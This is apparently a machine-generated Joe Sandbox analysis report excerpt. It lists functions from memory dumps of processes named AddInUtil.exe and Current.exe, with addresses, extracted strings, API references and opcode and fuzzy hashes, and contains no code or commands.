0[^d, xrefs: 00007FF848F22068
H[^d, xrefs: 00007FF848F2212C
P[^d, xrefs: 00007FF848F221ED
[^d<, xrefs: 00007FF848F22046
`[^d, xrefs: 00007FF848F221D3
@[^d, xrefs: 00007FF848F22103
[^d, xrefs: 00007FF848F21FCC
([^d, xrefs: 00007FF848F22018
X[^d, xrefs: 00007FF848F221FA
p[^d, xrefs: 00007FF848F221C6
h[^d, xrefs: 00007FF848F22027

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: [^d$([^d$0[^d$@[^d$H[^d$P[^d$X[^d$[^d<$`[^d$h[^d$p[^d$x[^d
API String ID: 0-1454663586
Opcode ID: feb1733f21bde7c22ae57507c9b9df8a0fd8e972299fc3d62a3a5f5f4543e2df
Instruction ID: d0647dbdd7f15e113f6b51a73419c1efa0195995529bbcd3e0fa11d327b4d54c
Opcode Fuzzy Hash: feb1733f21bde7c22ae57507c9b9df8a0fd8e972299fc3d62a3a5f5f4543e2df
Instruction Fuzzy Hash: 99C10271D0EA8D8FE756DB7888253A57FE1EF66340F8400BBC049DB2E6DB3858468716

Function 00007FF848F205FA Relevance: 5.1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

Strings

N_^|, xrefs: 00007FF848F206CA
N_^z, xrefs: 00007FF848F206C2
N_^|, xrefs: 00007FF848F206C9
>N_^, xrefs: 00007FF848F20601

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: >N_^$N_^z$N_^|$N_^|
API String ID: 0-1441849023
Opcode ID: 45e59e515db3902d815fbf6c341d61158a4ab8e25e1ed3db464254bc47aa94da
Instruction ID: badc9a5225fd5c6b6665644fba806148ebe16398684ea231c89f9841c30d75c2
Opcode Fuzzy Hash: 45e59e515db3902d815fbf6c341d61158a4ab8e25e1ed3db464254bc47aa94da
Instruction Fuzzy Hash: 91316F1BB2B53266D26176EE78461EE5B50DFC07FAF084633D69CCD0D35A0C608945F9

Analysis Process: Current.exePID: 2584, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F6F038 Relevance: 3.4, Strings: 1, Instructions: 2177COMMON

Download Yara Rule

Strings

M_H, xrefs: 00007FF848F7276F

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: M_H
API String ID: 0-372873180
Opcode ID: 25f212e6f17c0105e97958db273abbade739a785649eadf413def262798f87c9
Instruction ID: c8c4e77faf4eaf7fef21091df4a7bb7e7bab2dcf904a7816c4c3b4ac67836fa1
Opcode Fuzzy Hash: 25f212e6f17c0105e97958db273abbade739a785649eadf413def262798f87c9
Instruction Fuzzy Hash: 85F2A470A1CA498FEB94EF68C495BA97BE1FF58340F1441B9D44ED7292DB35AC82CB40

Function 00007FF848F6F018 Relevance: .9, Instructions: 896COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cc05e978c374af883b96820cd368466e9dc57ad8b2f7511e5a17a4d0de41b4
Instruction ID: 0252d04581ca5ee1e50fc19300d97275827d15808fe2462ada9c3f3cd06e371d
Opcode Fuzzy Hash: 75cc05e978c374af883b96820cd368466e9dc57ad8b2f7511e5a17a4d0de41b4
Instruction Fuzzy Hash: E152BE31A1CE4A8FE7A8EB289445675B3E1FF98350F55067DD44EC32C6DF28A8828785

Function 00007FF848F79B91 Relevance: 3.1, Strings: 2, Instructions: 620
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FF848F79E69
I_H, xrefs: 00007FF848F79EA1

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: d$I_H
API String ID: 0-2860773892
Opcode ID: 3d9492abb7a57ebf0f5ff066e83e48a0d83954ec0b23b0ea535cf30105615a84
Instruction ID: 0393bf056ad2ca5c201c9a3f93d9e2add6cee56f55b18f215d84d7497864c7f3
Opcode Fuzzy Hash: 3d9492abb7a57ebf0f5ff066e83e48a0d83954ec0b23b0ea535cf30105615a84
Instruction Fuzzy Hash: 72020D30A1CE0A8FE759EF289485675B3E1FF99340F1445BDD44AC7297DA28EC42C785

Function 00007FF848F70080 Relevance: 2.3, Strings: 1, Instructions: 1089
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

VH_H, xrefs: 00007FF848F7E5BE

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: VH_H
API String ID: 0-4103068451
Opcode ID: 11945a96e0078ff897229fb2a5d1395bab51338f13342d6e474132893a40fef5
Instruction ID: 3fce9ce0fafbc2e9ac996a2c4bce95b2656ec76188d8c6189fc01e2912ce5ec6
Opcode Fuzzy Hash: 11945a96e0078ff897229fb2a5d1395bab51338f13342d6e474132893a40fef5
Instruction Fuzzy Hash: 1D728E31A1CA4A8FEB88EF1C989567973E1FF98B40F14017AD44AC72D6DF34E8428785

Function 00007FF848F7BF70 Relevance: 2.3, Strings: 1, Instructions: 1007COMMON

Download Yara Rule

Strings

dS_L, xrefs: 00007FF848F7C04F

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: dS_L
API String ID: 0-3115541377
Opcode ID: 056d0bc8572131143989c2c8a362d5b6cdd054e4446cf508197d2a1b24cf43a6
Instruction ID: 4751889e1a2b4d0388b0f061c04217c1a2e582de369debdff6e717cbf9d1d298
Opcode Fuzzy Hash: 056d0bc8572131143989c2c8a362d5b6cdd054e4446cf508197d2a1b24cf43a6
Instruction Fuzzy Hash: 4C62147181DA864FF3A9AB2848565B53BE0EF563A0F0401BDD48DCB5E3FF1C680A8759

Function 00007FF848F6D898 Relevance: 2.0, Strings: 1, Instructions: 707
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pHmo, xrefs: 00007FF848F849CB

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: pHmo
API String ID: 0-967625435
Opcode ID: 232172cfcbe6125da95a51428a079c6f6bebdd56da00041fbf4f24217264581b
Instruction ID: 0242722d53d5b1e837bcd6cd075dd44f09afb7cc24ebfc7aaf9ad48aae0aefb2
Opcode Fuzzy Hash: 232172cfcbe6125da95a51428a079c6f6bebdd56da00041fbf4f24217264581b
Instruction Fuzzy Hash: 7F227E31A1C94E8FEB98EF68D455AA977E1FFA9390F140179D40EC3296DF24EC428784

Function 00007FF848F83C56 Relevance: 1.9, Strings: 1, Instructions: 689
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Hmo, xrefs: 00007FF848F8441D

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: `Hmo
API String ID: 0-1773509956
Opcode ID: 7b871dd098b15db2285a9b5b2af9aee4282f25fe82e23fb81a81f8d2ca894ced
Instruction ID: 268c5157089c17c6b9aefa5c25ca65619b88e401d90d2e5b4bd0c0e5ec19fa69
Opcode Fuzzy Hash: 7b871dd098b15db2285a9b5b2af9aee4282f25fe82e23fb81a81f8d2ca894ced
Instruction Fuzzy Hash: 3A227F30A1CA598FEBA8EB2C9455BA977E1FF59340F1041BAD04DC72D6DF34AC428B85

Function 00007FF848F85B3D Relevance: 1.8, Strings: 1, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_u]H, xrefs: 00007FF848F85D2D

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: _u]H
API String ID: 0-2533523688
Opcode ID: b67839667c376e7497f4b5c37c12069d008b1d43b5bf5653044105a5891524ab
Instruction ID: e6ebcc428035b99048b00c0fd121c00483f912bc4bd1854662302675a8f15eea
Opcode Fuzzy Hash: b67839667c376e7497f4b5c37c12069d008b1d43b5bf5653044105a5891524ab
Instruction Fuzzy Hash: 87F18230B1CA4D4FDB99EB2C9855AA977E1FF99350F1041BAD04EC72D2DF28AC428B45

Function 00007FF848F73E20 Relevance: 1.8, Strings: 1, Instructions: 525
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_u]H, xrefs: 00007FF848F85D2D

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: _u]H
API String ID: 0-2533523688
Opcode ID: ae5df824e720490647d2af2634d0db807a964254f1a9821ec813a56ea5841ec4
Instruction ID: 525df28e931e66ab54f82704fe0f49ef0b1e1d2d235852e62e3e398234eb7a28
Opcode Fuzzy Hash: ae5df824e720490647d2af2634d0db807a964254f1a9821ec813a56ea5841ec4
Instruction Fuzzy Hash: D0E15C30B1C91C4FEB98FB6C9855AA977E1EF99350F1041B9E04ED3296DF28AC428B45

Function 00007FF848F7A3A8 Relevance: 1.8, Strings: 1, Instructions: 523COMMON

Download Yara Rule

Strings

dS_L, xrefs: 00007FF848F7C04F

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: dS_L
API String ID: 0-3115541377
Opcode ID: 07bc8d607e348ffa9ea00c0345694e830433ee2e7f19a0b3c9bb0d24b2acb94b
Instruction ID: 2ce759ff90ae70568c1e00d27f827874a3bb9f14083958b7c1d4e81a43edd430
Opcode Fuzzy Hash: 07bc8d607e348ffa9ea00c0345694e830433ee2e7f19a0b3c9bb0d24b2acb94b
Instruction Fuzzy Hash: 3EE12531A1DE894FF7A5EB2C98152B977E1EF9A750F0401BED04DC72D3DE28A8068785

Function 00007FF848F7A418 Relevance: 1.8, Strings: 1, Instructions: 508
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hmo, xrefs: 00007FF848F87274

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: Hmo
API String ID: 0-1485354029
Opcode ID: a168a5c713c8e55a1bf126fe0b778eadb0fcde98a0a8e76491c69a968b08bea2
Instruction ID: e7ecf15c6483a04895d2e9e9f29755f2c71a383f783c2e7dcb97fd82c3018ef5
Opcode Fuzzy Hash: a168a5c713c8e55a1bf126fe0b778eadb0fcde98a0a8e76491c69a968b08bea2
Instruction Fuzzy Hash: A6E10131A1DE894FE795EB3C9819B657BE1EF9A350F0441BAE049C72E3DF289C068741

Function 00007FF848F3EB79 Relevance: 1.6, APIs: 1, Instructions: 128
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FF848F3EC3D

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f3e000_Current.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 79e4e860c4a19d30582f085e3bcf52995593fd90034ed1584c3af0db59e783d5
Instruction ID: a6dc290bd1a871ec46e81a1880967b52d9beaa1c5090332c23d3a67044100ada
Opcode Fuzzy Hash: 79e4e860c4a19d30582f085e3bcf52995593fd90034ed1584c3af0db59e783d5
Instruction Fuzzy Hash: A931E73190CB4C5FDB18EB9C98066FE7BE1EF95321F04426FE04AD3292DB7468058B86

Function 00007FF848F7D2C5 Relevance: 1.5, Strings: 1, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

u]H, xrefs: 00007FF848F7D2F4

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: u]H
API String ID: 0-242696566
Opcode ID: 2db92c0f8060a5c67f4192641b960dbeb29541d311f2cb6725ea138de2354438
Instruction ID: 3317c44d205a0656f78c9b5c1899e7ec4a4189a8e3252cbbcdd120b926d141be
Opcode Fuzzy Hash: 2db92c0f8060a5c67f4192641b960dbeb29541d311f2cb6725ea138de2354438
Instruction Fuzzy Hash: 7CA15D30A1C9498FEB99FF2CD495AA977E1FF99344F5400A9E00DC7296DA25EC92CB40

Function 00007FF848F712F5 Relevance: 1.5, Strings: 1, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c(, xrefs: 00007FF848F7133A

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: c(
API String ID: 0-2673083394
Opcode ID: edacc9464a41cd8c01f79d43e56ea4f5fb7349e9de3558f47a873e95b2480d9a
Instruction ID: d107fdb1f5bbc31e625f0d68a1a9753b540a305492b8026dcdd71785bcfa1125
Opcode Fuzzy Hash: edacc9464a41cd8c01f79d43e56ea4f5fb7349e9de3558f47a873e95b2480d9a
Instruction Fuzzy Hash: 2D713531B1CD494FE798FB2CA84567537D1EF9A360B0401BAD48EC3293EE25EC428784

Function 00007FF848F765B1 Relevance: 1.4, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00007FF848F767FA

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: fbd908ad3af3ce509677d8eafa434f9f470b65a72f3c0df54a7a58c25b2c7798
Instruction ID: 8880919f45b0bf1c7dc6a3d09ce0543041411a31dfc3ade1fe5aef67d76b7d15
Opcode Fuzzy Hash: fbd908ad3af3ce509677d8eafa434f9f470b65a72f3c0df54a7a58c25b2c7798
Instruction Fuzzy Hash: 07518F30A0CA094FF758B76984553B9B7D2EF98394F50417DD88FC66D3DE2CA8868254

Function 00007FF848F76660 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF848F767FA

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4ea93bd6fae5ece9e9475d7aa69a92467d909c0b2f6342cfd7d49b5d5bfccc24
Instruction ID: 8a1381e620245927ed13f7c1682f53309a9b2600a477e956f96320e62c5ab1d4
Opcode Fuzzy Hash: 4ea93bd6fae5ece9e9475d7aa69a92467d909c0b2f6342cfd7d49b5d5bfccc24
Instruction Fuzzy Hash: CD51AF3060DA094FF758B76980557B9B7D2FF98390F54417DD88FC76D2CE2CA8468258

Function 00007FF848F7A4A8 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

', xrefs: 00007FF848F7CA25

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-3744524632
Opcode ID: b3f802f4c895d08f80e3b14358f25c80ead3bfea6e364a65125eb8fbe0956be7
Instruction ID: 0b411ee09036ef9484d54ec162e63f6bfc5881e838ba59ac01a2f3d429c33a5f
Opcode Fuzzy Hash: b3f802f4c895d08f80e3b14358f25c80ead3bfea6e364a65125eb8fbe0956be7
Instruction Fuzzy Hash: D4417031B0CD1C4FEB94EB6CA4556ADB7E2EF59311F0401AAE00DD3296DE25AC418784

Function 00007FF848F833F5 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

@Hmo, xrefs: 00007FF848F8355C

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: @Hmo
API String ID: 0-3381080698
Opcode ID: 86b639f8daf9c277e9c03281da86837fb89d514f333258fce3a4818fbacfe12f
Instruction ID: 4372fd55f94d24b10cccbde2292484e2a7bc1b789ccf229401b2bf6510e847fd
Opcode Fuzzy Hash: 86b639f8daf9c277e9c03281da86837fb89d514f333258fce3a4818fbacfe12f
Instruction Fuzzy Hash: 8B413970E1DA874FE369BB3C58169B97BC2EF85280F4414BDC0498B1E3DF2968498386

Function 00007FF848F6DBA8 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

kI_I, xrefs: 00007FF848F6DC04

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: kI_I
API String ID: 0-2148246014
Opcode ID: 7e3752faac387862e14fdcb4d3a0822a35b88cf346a01eec07954d10128fd9ab
Instruction ID: d2ca72ae33ec2685848d5c330eaeac020467259ad15b6a97acad909433172220
Opcode Fuzzy Hash: 7e3752faac387862e14fdcb4d3a0822a35b88cf346a01eec07954d10128fd9ab
Instruction Fuzzy Hash: E3412971C0DAC94FE359EB38581A1B57FA0FF61290F4905FED144DB1DBEE2A98068345

Function 00007FF848F3EE0D Relevance: 1.4, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF848F3EEA7

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f3e000_Current.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e563897823056e311cc1c86b6ed3015429fefd8a1959c8cdab71cfd718cf0de2
Instruction ID: b4f50b4c849a2526abf26ed0cef1f10be6c576615a822c3646932a39d33383ae
Opcode Fuzzy Hash: e563897823056e311cc1c86b6ed3015429fefd8a1959c8cdab71cfd718cf0de2
Instruction Fuzzy Hash: 1D21F23190C64C4FEB58EFA8984A7FA7BE1EF96320F04816FD049C3292CB789445CB91

Function 00007FF848F6D678 Relevance: 1.3, Strings: 1, Instructions: 1COMMON

Download Yara Rule

Strings

{', xrefs: 00007FF848F70551, 00007FF848F705C3

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID: {'
API String ID: 0-2381349322
Opcode ID: f13bf7f73daddf0495cccc70bc67390dff723f5a4920c8f53dc77c78b0a0e7b7
Instruction ID: 00c65453887952b62191a4a891449ea5a3762c30b15551798557ba7976fc8194
Opcode Fuzzy Hash: f13bf7f73daddf0495cccc70bc67390dff723f5a4920c8f53dc77c78b0a0e7b7
Instruction Fuzzy Hash:

Function 00007FF848F880C0 Relevance: 1.2, Instructions: 1237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95cb37d7b1f740df5304616fdecc0370f8e41d898cbeb7b3275f09d678c66dcb
Instruction ID: dc438cdaec4400d1102fccc263421f932f83c380085ee16ca81dd35c11992490
Opcode Fuzzy Hash: 95cb37d7b1f740df5304616fdecc0370f8e41d898cbeb7b3275f09d678c66dcb
Instruction Fuzzy Hash: C1821A30A2CA4A4FE7A9EB2C84546B977E2FF95391F54067DD04EC32C6DF28AC429744

Function 00007FF849010F04 Relevance: .9, Instructions: 910COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2700515630.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff849010000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c54397972b245f854b2f3a3240819eb6e9a9c03884957c92c3b732ac436087e
Instruction ID: 625c6aed2b36bf91b9168619d0b1437f79966170589058034efb6e5cb30f87cf
Opcode Fuzzy Hash: 6c54397972b245f854b2f3a3240819eb6e9a9c03884957c92c3b732ac436087e
Instruction Fuzzy Hash: 1632B421F1DE8B9FFBF9AA2C142663552D2EFD9690B5805BAC04DC32D7ED2EDC064241

Function 00007FF848F6F070 Relevance: .9, Instructions: 854COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2442fe3b2559754947f3f1ff85da550bb3edf5bb1ff639aea8fe1747c8ad098
Instruction ID: 076b56cdd6e58ebc5508d2dace86a260b6dcf33a47b6fa499b9e64bef83ecc03
Opcode Fuzzy Hash: b2442fe3b2559754947f3f1ff85da550bb3edf5bb1ff639aea8fe1747c8ad098
Instruction Fuzzy Hash: 9B52467051DB855FE369AB2894167BA7BE1FF89350F1405BED0CAC71E3DE28A802C746

Function 00007FF848F7FFB0 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9fe3a7c7cd4846d8d4ecea14cc53c4476b72cdda6ab29c2e269059b4ae5c84
Instruction ID: 4e018c066715b5ad0f70ff0a7e470da8c3d6df4978bc6c2c7752a60d19188352
Opcode Fuzzy Hash: be9fe3a7c7cd4846d8d4ecea14cc53c4476b72cdda6ab29c2e269059b4ae5c84
Instruction Fuzzy Hash: 3D327A31A1C9098FEBA8FB2C9459A6937D1FF98340F5501BAE44EC72E2DF28EC418755

Function 00007FF848F7CE31 Relevance: .7, Instructions: 737COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce43d94889cffdaa3d4e4b1d05a484dc5bf16d770d7a0ed8fa67b37e6a25af91
Instruction ID: 2abfa4892d36e41d4e2d67781beb140c0f1952ef89478094969d2958445c67cd
Opcode Fuzzy Hash: ce43d94889cffdaa3d4e4b1d05a484dc5bf16d770d7a0ed8fa67b37e6a25af91
Instruction Fuzzy Hash: 5C324C30A1C94A8FEB99FF28D496AA977E1FF58340F5400A9E40DC72D6DB25EC52C784

Function 00007FF849011761 Relevance: .6, Instructions: 631COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2700515630.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff849010000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e6f1b4c2a5c65e77150aaa69bbe0d29388a9d435c68c885d048327c186d111
Instruction ID: 1a90b2492702fbfce0e755fc724a96b74326c5a93577402510c6fd3ff3033069
Opcode Fuzzy Hash: 19e6f1b4c2a5c65e77150aaa69bbe0d29388a9d435c68c885d048327c186d111
Instruction Fuzzy Hash: 68027221F1DD9A8FEAF9BB2C105267916D2EF956D0F6415BAD00DC32C3EE1EE8434285

Function 00007FF848F80DA1 Relevance: .6, Instructions: 597COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f7e138f1f5eeeff2b27b303fcedbf14a9e2188f9c1b6f5bb29bcb0613e5d18
Instruction ID: 8334950665f0cfe5cf7569cc60dc49245116b2ea093b9d5b05537f2a59da14f6
Opcode Fuzzy Hash: 03f7e138f1f5eeeff2b27b303fcedbf14a9e2188f9c1b6f5bb29bcb0613e5d18
Instruction Fuzzy Hash: FC021D31A1C9498FDB98FF2CD455EA977E1FFA8340F5041A9E40EC7296DE25EC428B84

Function 00007FF848F7A480 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef20922a5a287de54c75c836f3a4c27ab1edda5bc6d7f3afdd4808885f7bacf
Instruction ID: d009ac187563b55fcf841cab52ef9ad415ad936e28df36863198a80c60cecc25
Opcode Fuzzy Hash: 2ef20922a5a287de54c75c836f3a4c27ab1edda5bc6d7f3afdd4808885f7bacf
Instruction Fuzzy Hash: BB023F34618A498FDB98EF6CD495AA973E2FF98350F2405A9D41DC7296CF35EC42CB40

Function 00007FF848F79110 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b93915206228506c9c1c12af4542306943b14fe3ed031b1cdb5df07e4cc890c
Instruction ID: f96e6d22de40c5b46a82b50be38a69f8bd8faef8b675ed49e41b968d5ee638e2
Opcode Fuzzy Hash: 1b93915206228506c9c1c12af4542306943b14fe3ed031b1cdb5df07e4cc890c
Instruction Fuzzy Hash: 96D10430A2DE4A5FE359EB2888856BA77E1FF95340F50057DD48EC3186DF28B8128795

Function 00007FF848F77F10 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

